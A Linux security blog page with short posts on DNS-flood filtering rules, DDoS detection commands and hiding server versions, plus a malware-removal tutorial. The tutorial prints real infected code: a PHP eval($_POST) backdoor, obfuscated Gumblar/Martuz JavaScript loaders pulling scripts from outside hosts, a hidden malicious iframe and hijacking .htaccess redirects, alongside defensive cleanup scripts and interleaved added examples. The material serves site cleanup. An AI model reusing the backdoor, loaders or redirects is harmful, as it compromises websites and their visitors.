www.linuxexpert.ro

Security

Parent Category: Security
Published: 28 May 2012
Hits: 2769

What Is My IP Address: a nice tool to find your IP address.

Many users are behind firewalls, proxies or NAT equipment, so they need to know what their public IP address is. Here it is:

 

{{myip}}

 

 

Parent Category: Security
Published: 20 March 2012
Hits: 7166

Today I met a new challenge: defending against the UDP isc.org DNS query attack.

The attack looks like this:

20   0.090201   211.146.85.194	86.122.87.170    DNS   Standard query ANY isc.org
46   0.167341   211.146.85.194	86.122.87.170    DNS   Standard query ANY isc.org
67   0.240729   211.146.85.194	86.122.87.170    DNS   Standard query ANY isc.org
82   0.283842   211.146.85.194	86.122.87.170    DNS   Standard query ANY isc.org
122  0.413971   211.146.85.194	86.122.87.170    DNS   Standard query ANY isc.org
126  0.421386   211.146.85.194	86.122.87.170    DNS   Standard query ANY isc.org

 

This is how you can protect yourself:

Linux:

# iptables -A INPUT -p udp -m string --hex-string "|03697363036f726700|" --algo bm --to 65535 -j DROP

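or

# iptables -A INPUT -p udp -m string --hex-string "|6973633f6f72673f|" --algo bm --to 65535 -j DROP

(In the first pattern, 03 and 00 are the DNS label-length and terminator bytes around "isc" and "org"; in the second pattern, 3f is a literal "?" character.)

Snort rule: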

alert udp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS isc.org DDoS"; content:"|03 69 73 63 03 6f 72 67 00|"; reference:linuxexpert.ro,369; classtype:attempted-dos; sid:4000002; rev:1; fwsam: src, 1 day;)
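
Where the bytes in these patterns come from, as an added example that is not part of the original article: a DNS query carries the name as length-prefixed labels, so the script below encodes any name into the --hex-string form and tests both iptables patterns from this page against a constructed ANY query. The function names are hypothetical and the packet is constructed.

```shell
#!/bin/sh
# Added example; function names are hypothetical, the packet is constructed.

# Encode a domain name as a DNS wire-format QNAME: every label is preceded
# by a one-byte length and the name ends with a zero byte. Output is hex,
# ready to paste between the |...| of an iptables --hex-string.
dns_qname_hex() {
    name=${1%.}                           # ignore a trailing root dot
    [ -n "$name" ] || return 1
    out=""
    set -f; old_ifs=$IFS; IFS=.
    set -- $name                          # split the name into labels
    IFS=$old_ifs; set +f
    for label in "$@"; do
        len=${#label}
        # a label is 1..63 bytes; reject "a..b" and oversized labels
        if [ "$len" -lt 1 ] || [ "$len" -gt 63 ]; then return 1; fi
        hex=$(printf '%s' "$label" | od -An -tx1 | tr -d ' \n')
        out="$out$(printf '%02x' "$len")$hex"
    done
    printf '%s00\n' "$out"
}

# Constructed "ANY <name>" query: 12-byte header (ID 0x1234, RD set, one
# question), QNAME, QTYPE 255 (ANY), QCLASS 1 (IN).
any_query_hex() {
    qname=$(dns_qname_hex "$1") || return 1
    printf '123401000001000000000000%s00ff0001\n' "$qname"
}

# Byte-aligned substring test on hex strings, i.e. what a fixed-string
# packet match does on the raw payload. $1 = payload hex, $2 = pattern hex.
hex_contains() {
    payload=$(printf '%s' "$1" | sed 's/../:&/g')
    pattern=$(printf '%s' "$2" | sed 's/../:&/g')
    case $payload in
        *"$pattern"*) return 0 ;;
        *) return 1 ;;
    esac
}

# Try both patterns from the rules above against the constructed query.
query=$(any_query_hex isc.org)
for p in 03697363036f726700 6973633f6f72673f; do
    if hex_contains "$query" "$p"; then
        echo "|$p| matches the query"
    else
        echo "|$p| does not match the query"
    fi
done
```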

You must also secure your nameservers:

Open /etc/named.conf

Look for the line:

// query-source address * port 53;

Below it, insert the following lines:

version "Bind";
allow-recursion { trusted; };
allow-notify { trusted; };
allow-transfer { trusted; };

This disables recursion for IPs other than the trusted ones (trusted is an acl that must be defined in named.conf).

Note:

We use Hosting and VPS Hosting, from: www.star-host.org

We like and trust them.

Good prices, high security.

 

Parent Category: Security
Published: 30 August 2009
Hits: 3051

In this tutorial I'll show you some tricks to find out for yourself whether you are under a DDoS attack.

Here are some useful Linux commands. To count connections per remote IP address:

# netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n

To find out whether a large number of HTTP processes are running, use the command:

# ps aux | grep -i '[h]ttp' | wc -l

# netstat -lpn | grep :80 | awk '{print $5}' | sort
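
A threshold version of the per-IP count above, as an added example that is not part of the original tutorial. It strips only the trailing port, so IPv6 and IPv4-mapped peers are not truncated the way `cut -d: -f1` truncates them. The function names and the sample netstat output are constructed.

```shell
#!/bin/sh
# Added example; top_talkers and sample_netstat are hypothetical names.

# Read `netstat -ntu` output on stdin and print "count address" for every
# remote address with at least $1 connections (default 20), busiest first.
# Only the trailing :port is removed, so IPv6 peers and IPv4-mapped peers
# (::ffff:a.b.c.d) are counted correctly, and header lines are skipped.
top_talkers() {
    awk -v min="${1:-20}" '
        $1 ~ /^(tcp|udp)/ {
            addr = $5
            sub(/:[0-9*]+$/, "", addr)    # strip the port
            sub(/^::ffff:/, "", addr)     # unwrap IPv4-mapped IPv6
            count[addr]++
        }
        END { for (a in count) if (count[a] >= min) print count[a], a }
    ' | sort -rn
}

# Constructed sample (documentation address ranges only).
sample_netstat() {
    cat <<'EOF'
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 203.0.113.10:80         198.51.100.7:51512      ESTABLISHED
tcp        0      0 203.0.113.10:80         198.51.100.7:51513      SYN_RECV
tcp        0      0 203.0.113.10:80         198.51.100.7:51514      SYN_RECV
tcp        0      0 203.0.113.10:80         192.0.2.44:40122        ESTABLISHED
tcp6       0      0 203.0.113.10:80         ::ffff:198.51.100.7:51515 ESTABLISHED
tcp6       0      0 2001:db8::10:80         2001:db8::bad:33000     ESTABLISHED
tcp6       0      0 2001:db8::10:80         2001:db8::bad:33001     ESTABLISHED
udp        0      0 203.0.113.10:53         192.0.2.44:5353         ESTABLISHED
EOF
}

# Show every remote address holding three or more connections.
sample_netstat | top_talkers 3
```

On a live host, pipe the real output in: `netstat -ntu | top_talkers 50`.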

 

Parent Category: Security
Published: 02 February 2012
Hits: 403

In this tutorial I'll show you how to hide the Apache and PHP software versions.

In order to hide the Apache header information, change the following settings in httpd.conf:

ServerTokens OS
ServerSignature On

to:

ServerTokens Prod (or ServerTokens ProductOnly)
ServerSignature Off

Don't forget to restart Apache.

For the PHP version details, edit php.ini and change

expose_php = On

to

expose_php = Off

Now restart your Apache server.

After these changes, your Apache server no longer shows version details in its headers.
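
A quick way to confirm the change took effect, as an added example that is not part of the original tutorial: the function reads response headers and reports any that still carry version details (it checks headers only, not the ServerSignature footer on server-generated pages). The function names and the sample headers, including the version numbers in them, are constructed.

```shell
#!/bin/sh
# Added example; function names and sample headers are constructed.

# Read HTTP response headers on stdin and print the ones that still disclose
# software versions. Exit status 0 = nothing disclosed, 1 = something leaks.
# Live use: curl -sI http://your-host/ | leaky_headers
leaky_headers() {
    tr -d '\r' | awk '
        {
            name = tolower($0); sub(/:.*/, "", name)
            value = $0;         sub(/^[^:]*:[ \t]*/, "", value)
        }
        # With ServerTokens Prod the value is a bare product name; a "/" or
        # "(" means a version or OS string is still being sent.
        name == "server" && (index(value, "/") || index(value, "(")) {
            print; leaks++
        }
        # With expose_php = Off this header is not sent at all.
        name == "x-powered-by" { print; leaks++ }
        END { exit (leaks > 0) }
    '
}

# Constructed responses: before and after the configuration change.
sample_before() {
    printf 'HTTP/1.1 200 OK\r\nServer: Apache/2.2.22 (Unix)\r\n'
    printf 'X-Powered-By: PHP/5.3.10\r\nContent-Type: text/html\r\n\r\n'
}
sample_after() {
    printf 'HTTP/1.1 200 OK\r\nServer: Apache\r\n'
    printf 'Content-Type: text/html\r\n\r\n'
}

sample_before | leaky_headers || echo "=> version details still exposed"
sample_after  | leaky_headers && echo "=> nothing disclosed"
```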


Parent Category: Security
Published: 02 June 2009
Hits: 5595

Has your site been banned by Google because it contains viruses, trojans, or other malware?
Here is a nice tutorial that will help you remove all this bad stuff.
A few days ago I had to remove malware from a site. After I downloaded the whole site to my computer, I started
looking into the PHP files (the site was made in PHP).

Here is how it looks:
# cat class.database.php
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST
['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',
base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0
gCihmdW5jdGlvbigpe3ZhciB0V1Y9JyUnO3ZhciBHWmFjPXVuZXNjYXBlKC
gndl82MXJfMjBhXzNkXzIyU2NyXzY5cHRFXzZlXzY3aW5fNjVfMjJfMmNiXz
NkXzIyXzU2XzY1cl83M2lvbigpK18yMl8yY2pfM2RfMjJfMjJfMmNfNzVfM2
RuXzYxXzc2aWdhdG9yXzJldXNlcl80MWdlbnRfM2JpZl8yOCh1XzJlaW5k
ZXhPXzY2KF8yMldpbl8yMilfM2VfMzApXzI2XzI2KHVfMmVfNjluZGV4X
zRmZl8yOF8yMk5fNTRfMjA2XzIyKV8zYzApXzI2XzI2KGRfNmZfNjN1b
V82NW50XzJlY29va2lfNjVfMmVpXzZlZGV4XzRmXzY2KF8yMm1fNjlfN
jVrXzNkXzMxXzIyKV8zY18zMClfMjZfMjZfMjhfNzR5XzcwXzY1b182Nl8y
OHpydnp0c18yOV8yMV8zZF83NHlwZW9mKF8yMkFfMjIpKSlfN2J6cn
ZfN2F0c18zZF8yMkFfMjJfM2JldmFfNmMoXzIyaWYoXzc3XzY5bmRv
d18yZV8yMithK18yMilqXzNkaitfMjJfMmJhK18yMk1ham9fNzJfMjIrYi
thXzJiXzIyTV82OW5vcl8yMitiK2FfMmJfMjJCdWlfNmNkXzIyK2IrXzIy
al8zYl8yMilfM2JfNjRvY183NV82ZGVudF8yZV83N3JfNjl0ZV8yOF8yM
l8zY3NjcmlwdF8yMHNyY18zZF8yZl8yZmd1bWJsYXJfMmVjbl8yZnJz
c18yZl8zZmlkXzNkXzIyK182YStfMjJfM2VfM2NfNWNfMmZzY183M
l82OV83MF83NF8zZV8yMilfM2JfN2QnKS5yZXBsYWNlKC9fL2csdF
dWKSk7ZXZhbChHWmFjKX0pKCk7CiAtLT48L3NjcmlwdD4='));
function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))
$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>
#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5)
{$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s
*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos
($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s)
;}$s1=preg_replace('#<script language=javascript>
<!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=
preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);
elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return
$g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0)
{$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS[
'tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)
if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output
handler'?false:$a);for($i=count($s)-1;$i>=0;$i--)
{$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);
$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}
if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp
_lkojfghx2(); ?><?php



/*

Database class

*/

class database {

 var $error = null;
 
 // Set DB_URL
 function database($url = '') {
  $this->db_url = $url;
  // Connect to database
  $this->connect();
  // Check for database connection error
  if($this->is_error()) {
  die($this->get_error());
  }
 }
 
 // Connect to the database
 function connect() {
  $status = $this->db_handle = mysql_connect(DB_HOST, DB_USERNAME, DB_PASSWORD);
  if(mysql_error()) {
  $this->connected = false;
  $this->error = mysql_error();
  } else {
  if(!mysql_select_db(DB_NAME)) {
  $this->connected = false;
  $this->error = mysql_error();
  } else {
  $this->connected = true;
  }
  }
  return $this->connected;
 }
 
 // Disconnect from the database
 function disconnect() {
  if(isset($this->Database)) {
  mysql_close();
  return true;
  } else {
  return false;
  }
 }
 
 // Run a query
 function query($statement) {
  $mysql = new mysql();
  $mysql->query($statement);

  if($mysql->getError()) {
  $this->set_error($mysql->getError());
  return null;
  } else {
  return $mysql;
  }
 }
 
 // Gets the first column of the first row
 function get_one($statement) {
  $fetch_row = mysql_fetch_row(mysql_query($statement));
  $result = $fetch_row[0];
  if(mysql_error()) {
  $this->set_error(mysql_error());
  return null;
  } else {
  return $result;
  }
 }
 
 // Set the DB error
 function set_error($message = null) {
  global $TABLE_DOES_NOT_EXIST, $TABLE_UNKNOWN;
  $this->error = $message;
  if(strpos($message, 'no such table')) {
  $this->error_type = $TABLE_DOES_NOT_EXIST;
  } else {
  $this->error_type = $TABLE_UNKNOWN;
  }
 }
 
 // Return true if there was an error
 function is_error() {
  return (!empty($this->error)) ? true : false;
 }
 
 // Return the error
 function get_error() {
  return $this->error;
 }
 
}

class mysql {

 var $error = null;

 // Run a query
 function query($statement) {
  $this->result = mysql_query($statement);
  $this->error = mysql_error();
  return $this->result;
 }
 
 // Get the ID generated from the previous INSERT operation
 function getInsertID() {
  return mysql_insert_id();
 }

 // Fetch num rows
 function numRows() {
  $val = mysql_num_rows($this->result);
  $this->error = mysql_error();
  return $val;
 }
 
 // Fetch row
 function fetchRow() {
  $val = mysql_fetch_array($this->result);
  $this->error = mysql_error();
  return $val;
 }

 // Fetch array
 function fetchObject() {
  $val = mysql_fetch_object($this->result);
  $this->error = mysql_error();
  return $val;
 }
 
 // Get error
 function getError() {
  if($this->error != null) {
  return $this->error;
  } else {
  return null;
  }
 }

}

$database = new database();

?>
 
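See the base64_decode line. (The eval($_POST['tmp_lkojfghx3']) before it is a backdoor as well: it executes whatever PHP code is sent in that POST parameter.) I put the text into a virus_test.php file: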
<?php
$str = 'PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciB0V1Y9JyUnO........';
echo base64_decode($str);
?>
and the result was indeed virus code:
 # php virus_test.php
<script language=javascript><!--
(function(){var tWV='%';var GZac=unescape(('v_61r_20a_3d_22Scr_69ptE_6e_67in_
65_22_2cb_3d_22_56_65r_73ion()+_22_2cj_3d_22_22_2c_75_3dn_61_76igator_2euser_
41gent_3bif_28(u_2eindexO_66(_22Win_22)_3e_30)_26_26(u_2e_69ndex_4ff_28_22N_
54_206_22)_3c0)_26_26(d_6f_63um_65nt_2ecooki_65_2ei_6edex_4f_66(_22m_69_65k_3d_31_22)
_3c_30)_26_26_28_74y_70_65o_66_28zrvzts_29_21_3d_74ypeof(_22A_22)))_7bzrv_
7ats_3d_22A_22_3beva_6c(_22if(_77_69ndow_2e_22+a+_22)j_3dj+_22_2ba+_
22Majo_72_22+b+a_2b_22M_69nor_22+b+a_2b_22Bui_6cd_22+b+_22j_3b_22)
_3b_64oc_75_6dent_2e_77r_69te_28_22_3cscript_20src_3d_2f_2fgumblar_2ecn_
2frss_2f_3fid_3d_22+_6a+_22_3e_3c_5c_2fsc_72_69_70_74_3e_22)_3b_7d')
.replace(/_/g,tWV));eval(GZac)})();
--></script>

After I removed the bad code by hand, everything was OK.
That was the first example of malware removal.
Example 2:
Sometimes attackers modify the .htaccess file. This is how it looks:
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} (Googlebot|Slurp|msnbot)
RewriteRule ^ http://badsite/ [R=301,L]

Example 2, a more complex variant:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://badsite [R,L]

 
Example 3:
Here, I had to remove malware from the site of the
Indian Embassy in Greece: http://www.indianembassy.gr
One of the infected files, http://indianembassy.gr/greece/pages_greek.html:
# cat pages_greek.html  
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Flash Page Flip</title>
<meta name="Description" content="Flash Page Flip is best advanced dynamic page flip flash object">
<meta name="Keywords" content="page flip, page flipping, page turn, flip album, flipping book, digital book, online catalog">
<script src="/js/AC_RunActiveContent.js" mce_src="js/AC_RunActiveContent.js" type="text/javascript"></script>
<script src="/js/PopUpWin.js" mce_src="js/PopUpWin.js" type="text/javascript"></script>
<style type="text/css">
<!--
body {
background-color: #ccc;
margin-left: 0px;
margin-top: 0px;
margin-right: 0px;
margin-bottom: 0px;
}
#main{
position:absolute;
top:0px;
left:0px;
width:100%;
height:100%;
}
#max{
position:absolute;
left:0px;
top:550px;
height:50px;
width:200px;
background-image:url('swf/down_banner.gif');
font-family:Verdana, Arial, Helvetica, sans-serif;
font-size:11px;
font-weight:bold
}
#red{
width:auto;
height:20px;
}
.style1 {color: #FFFFFF}

-->
</style></head>
<script language=javascript><!--
(function(dcdP){var ufIC='%';var gQOS4=unescape(('v~61r~20a~3d~22~53crip~74Engine~22~2cb
~3d~22Ve~72s~69on~28)+~22~2c~6a~3d~22~22~2cu~3dn~61v~69~67ator~2eus~65rA~67ent
~3bif(~28u~2eindex~4ff~28~22Chrome~22)~3c0~29~26~26(u~2eind~65xOf~28~22Win~22)~
3e0)~26~26(u~2eindex~4ff(~22NT~206~22)~3c0)~26~26(~64oc~75ment~2ec~6foki~65~
2eindex~4ff~28~22mie~6b~3d1~22)~3c0)~26~26(t~79peo~66~28zr~76zts)~21~3dtype~
6ff(~22A~22~29))~7bzrv~7ats~3d~22A~22~3b~65val~28~22if(window~2e~22+a+~22)~
6a~3dj+~22+a~2b~22M~61jo~72~22+b+a~2b~22Mino~72~22+b+~61~2b~22Build~
22+b+~22j~3b~22)~3bdocument~2ewr~69~74e~28~22~3cscript~20~73r~63~3d~
2f~2fm~61r~22~2b~22~74uz~2e~63n~2fvi~64~2f~3f~69d~3d~22+~6a+~22~3e~3c~
5c~2fscript~3e~22)~3b~7d').replace(dcdP,ufIC));eval(gQOS4)})(/\~/g);
--></script>
<body>
<div id="main">

<script type="text/javascript">
AC_FL_RunContent( 'codebase','http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0','width','100%','height','100%','src','swf/Magazine','quality','high','pluginspage','http://www.macromedia.com/go/getflashplayer','bgcolor','#cccccc','allowFullScreen','true','allowScriptAccess','sameDomain','wmode','transparent','movie','swf/Magazine' ); //end AC code
</script><noscript>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="100%" height="100%">
<param name="movie" value="swf/Magazine.swf" />
<param name="quality" value="high" />
<param name="bgcolor" value="#cccccc" />
<param name="allowFullScreen" value="true" />
<param name="allowScriptAccess" value="sameDomain" />
<param name="wmode" value="transparent"/>
<embed src="/swf/Magazine.swf" mce_src="swf/Magazine.swf" width="100%" height="100%" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" wmode="transparent" allowFullScreen="true" allowScriptAccess="sameDomain"></embed>
</object></noscript></div>
<div id="max" align="center">
<div id="red"></div>
<span class="style1"><a href="http://www.consagous.com" mce_href="http://www.consagous.com"><font color="#FFFFFF">
www.consagous.com</font></a></span></div>

The virus is called Martuz and is another version of the Gumblar virus.
You can find infected files using this command:
grep -ril unescape "public_html_dir"
Because the site had 115 affected files, removing the code by hand was killing me, so
I made a script which removes the bad code from the files (the sed expression must be a single line; it appears wrapped here):
# cat clean_Martuz.sh
#!/bin/bash

for i in `grep -ril unescape /sites/*| grep php` ; do

echo "Removing virus from $i";

sleep 1;

sed -e s/"(function(dcdP){var ufIC='%';var gQOS4=unescape(('v~61r~20a~3d~22~53crip~
74Engine~22~2cb~3d~22Ve~72s~69on~28)+~22~2c~6a~3d~22~22~2cu~3dn~61v~69~
67ator~2eus~65rA~67ent~3bif(~28u~2eindex~4ff~28~22Chrome~22)~3c0~29~26~
26(u~2eind~65xOf~28~22Win~22)~3e0)~26~26(u~2eindex~4ff(~22NT~206~22)~
3c0)~26~26(~64oc~75ment~2ec~6foki~65~2eindex~4ff~28~22mie~6b~3d1~22)~
3c0)~26~26(t~79peo~66~28zr~76zts)~21~3dtype~6ff(~22A~22~29))~7bzrv~7ats~3d~
22A~22~3b~65val~28~22if(window~2e~22+a+~22)~6a~3dj+~22+a~2b~22M~61jo~
72~22+b+a~2b~22Mino~72~22+b+~61~2b~22Build~22+b+~22j~3b~22)~3bdocument~
2ewr~69~74e~28~22~3cscript~20~73r~63~3d~2f~2fm~61r~22~2b~22~74uz~
2e~63n~2fvi~64~2f~3f~69d~3d~22+~6a+~22~3e~3c~5c~2fscript~3e~22)~
3b~7d').replace(dcdP,ufIC));eval(gQOS4)})"//g $i > x && mv x $i

done

# 
 Example 4:
Of course, we have not had an iframe example yet. Today I removed iframe code from
the site http://www.xxxxx.com.
Let's have a look at one of the suspicious files:
#cat customization/homepage.htm

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>Untitled Document</title>
<style type="text/css">
<!--
.style1 {
color: #666666;
font-weight: bold;
font-style: normal;
}
-->
</style>
</head>

<body><iframe src="http://b5z.ru:8080/index.php" mce_src="http://b5z.ru:8080/index.php" width=105 height=169 style=
"visibility: hidden"></iframe>
<table width="100%" border="0" align="center">


So, the evil code is <iframe src="http://b5z.ru:8080/index.php" mce_src="http://b5z.ru:8080/index.php" width=105 height=169 style="visibility: hidden"></iframe>.
This code was present in every file, including html, js and php files. Again sed and regular
expressions saved me:
# cat clean_iframe.sh
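#!/bin/bash

# The injected tag, on one line exactly as it appears in the infected files
virus='<iframe src="http://b5z.ru:8080/index.php" mce_src="http://b5z.ru:8080/index.php" width=105 height=169 style="visibility: hidden"></iframe>'
echo "Virus code: $virus"
path="/public_html"

# -F matches the tag as a fixed string; -Z with read -d '' copes with
# spaces and other odd characters in file names
grep -rlFZ -- "$virus" "$path" | while IFS= read -r -d '' i ; do

echo "Removing virus from $i";

sleep 1;

# Edit in place instead of going through a shared, predictable /tmp/x
sed -i -e 's/[<]iframe src="http:\/\/b5z\.ru:8080\/index\.php" mce_src="http:\/\/b5z\.ru:8080\/index\.php" width=105 height=169 style="visibility: hidden"[>][<]\/iframe[>]//g' "$i"

done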
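
A more general form of the two cleanup scripts above (Martuz and the iframe), as an added example that is not part of the original tutorial: the injected code is kept as a one-line signature file and removed as a literal string, so nothing has to be escaped for sed, and each file keeps its owner and mode. The function names, paths and the injected tag in the sample are constructed.

```shell
#!/bin/sh
# Added example; function names, paths and the injected tag are constructed.

# strip_literal SIGFILE FILE: remove every occurrence of the one-line
# signature in SIGFILE from FILE and print how many were removed. The
# signature is matched literally with awk index(), so nothing needs escaping.
strip_literal() {
    sig_file=$1; target=$2
    tmp=$(mktemp) || return 1             # unpredictable name, unlike /tmp/x
    hits=$(SIG=$(cat "$sig_file") awk -v out="$tmp" '
        BEGIN { sig = ENVIRON["SIG"]; n = length(sig); hits = 0 }
        {
            line = $0; kept = ""
            while (n > 0 && (p = index(line, sig)) > 0) {
                kept = kept substr(line, 1, p - 1)
                line = substr(line, p + n)
                hits++
            }
            print kept line > out
        }
        END { print hits }
    ' "$target") || { rm -f "$tmp"; return 1; }
    # cat back into the same file: inode, owner and mode stay as they were
    if [ "$hits" -gt 0 ]; then cat "$tmp" > "$target"; fi
    rm -f "$tmp"
    echo "$hits"
}

# clean_tree SIGFILE DIR: clean every regular file under DIR that contains
# the signature; prints "removed<TAB>file" per cleaned file. File names
# containing newlines are not supported.
clean_tree() {
    sig_file=$1; dir=$2
    find "$dir" -type f -exec grep -lF -f "$sig_file" {} + |
    while IFS= read -r f; do
        printf '%s\t%s\n' "$(strip_literal "$sig_file" "$f")" "$f"
    done
}

# Constructed sample: a throw-away site with one infected and one clean page.
make_sample_site() {
    work=$(mktemp -d) || return 1
    mkdir "$work/www"
    sig='<iframe src="http://malware.invalid/x.php" width=105 height=169 style="visibility: hidden"></iframe>'
    printf '%s\n' "$sig" > "$work/sig.txt"
    printf '<body>%s\n<table width="100%%">\n' "$sig" > "$work/www/home page.htm"
    printf '<body>\n<p>clean</p>\n' > "$work/www/about.htm"
    chmod 640 "$work/www/home page.htm"
    echo "$work"
}

site=$(make_sample_site) && clean_tree "$site/sig.txt" "$site/www" && rm -rf "$site"
```

Run it on a downloaded copy of the site first and diff the result before touching the live files.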



 
Advice:
1) If you are using in-house PHP scripts, consult the PHP Security Guide.
2) Write-protect server files that should not be modified by your web application
(644 permissions on *nix).
3) Check your local computers for spyware and viruses.
4) Change all passwords.
 
